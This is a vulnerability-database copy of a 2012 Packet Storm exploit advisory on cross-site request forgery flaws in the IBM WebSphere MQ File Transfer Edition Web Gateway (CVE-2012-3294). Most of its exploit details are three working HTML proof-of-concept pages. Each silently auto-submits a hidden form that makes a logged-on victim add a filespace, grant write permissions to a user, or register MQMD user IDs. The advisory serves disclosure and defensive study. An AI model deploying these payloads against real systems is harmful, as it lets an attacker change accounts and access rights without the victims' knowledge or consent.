Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNir ValtmanPACKETSTORM:115475
HistoryAug 13, 2012 - 12:00 a.m.

IBM WebSphere MQ File Transfer Edition Web Gateway CSRF

2012-08-1300:00:00
Nir Valtman
packetstormsecurity.com
34

0.005 Low

EPSS

Percentile

75.3%

JSON
`*Exploit Author:* Nir Valtman  
  
*Description:* Malicious user is able to add userspace, change permissions  
on existing userspace and add MQMD (MQ Message Descriptor) user IDs. All of  
the these vulnerabilities can be exploited using a CSRF (Cross Site Request  
Forgery) attack.  
Few days ago the CVE has  
been published here<http://www-01.ibm.com/support/docview.wss?uid=swg21607482>  
  
*  
*  
*Affected Platforms: *Version 7.0.4 and all previous versions of WebSphere MQ  
File Transfer Edition<http://publib.boulder.ibm.com/infocenter/wmqfte/v7r0/index.jsp>running  
on all platforms are affected.  
* *  
*  
*  
*Exploit Details:*  
*1. CSRF To add user and define his quota on a userspace*  
I created the following HTML page and then opened it by a logged-on user:  
  
<html>  
  
<head></head>  
  
<body>  
  
<form id="frm" method="post"  
action="https://*[ip-address-and-port]* /wmqfteconsole/Filespaces"  
  
<input type="hidden"  
name="nirvcsrf" value="junk" />  
  
<input type="hidden"  
name="name" value="zzzzzz" />  
  
<input type="hidden"  
name="quota" value="15" />  
  
<input type="hidden"  
name="id" value="NewFileSpace" />  
  
  
  
</form>  
  
<script>  
  
document.frm.submit();  
  
</script>  
  
</body>  
</html>  
See the following screenshot, which follows the execution of CSRF attack:  
[image: Inline image 1]  
  
*2. CSRF to add permissions on file spaces:*  
I created the following HTML page and then opened it by a logged-on user:  
  
<html>  
  
<head></head>  
  
<body>  
  
<form id="frm" method="post"  
action="https://*[ip-address-and-port]*  
/wmqfteconsole/FileSpacePermisssions"  
  
<input type="hidden"  
name="nirvcsrf" value="junk" />  
  
<input type="hidden"  
name="user" value="bodek2" />  
  
<input type="hidden"  
name="write" value="authorized" />  
  
<input type="hidden"  
name="id" value="zzzzzz_TEMP_PERMISSIONS" />  
  
  
  
</form>  
  
<script>  
  
document.frm.submit();  
  
</script>  
  
</body>  
</html>  
  
See the following screenshot, which follows the execution of CSRF attack:  
[image: Inline image 2]  
  
*2. CSRF to add MQMD user id:*  
I created the following HTML page and then opened it by a logged-on user:  
  
<html>  
  
<head></head>  
  
<body>  
  
<form id="frm" method="post"  
action="https://*[ip-address-and-port]*/wmqfteconsole/UploadUsers"  
  
<input type="hidden"  
name="nirvcsrf" value="junk" />  
  
<input type="hidden"  
name="userID" value="csrfUserId" />  
  
<input type="hidden"  
name="mqmdUserID" value="userIdTest" />  
  
<input type="hidden"  
name="id" value="NewUploadUser" />  
  
  
  
</form>  
  
<script>  
  
document.frm.submit();  
  
</script>  
  
</body>  
  
</html>  
  
See the following screenshot, which follows the execution of CSRF attack:  
[image: Inline image 3]  
  
Best Regards,  
Nir Valtman  
  
`

Related

cvelist 1
prion 1
cve 1
nvd 1
ibm 1
cvelist
cvelist
CVE-2012-3294
2012-08-17 10:00:00
prion
prion
Cross site request forgery (csrf)
2012-08-17 10:31:00
cve
cve
CVE-2012-3294
2012-08-17 10:31:52
nvd
nvd
CVE-2012-3294
2012-08-17 10:31:52
ibm
ibm
Security Bulletin: IBM WebSphere MQ File Transfer Edition Web Gateway vulnerable to CSRF attack (CVE-2012-3294)
2022-09-25 19:56:02

0.005 Low

EPSS

Percentile

75.3%

JSON
Related for PACKETSTORM:115475
cvelist1prion1cve1nvd1ibm1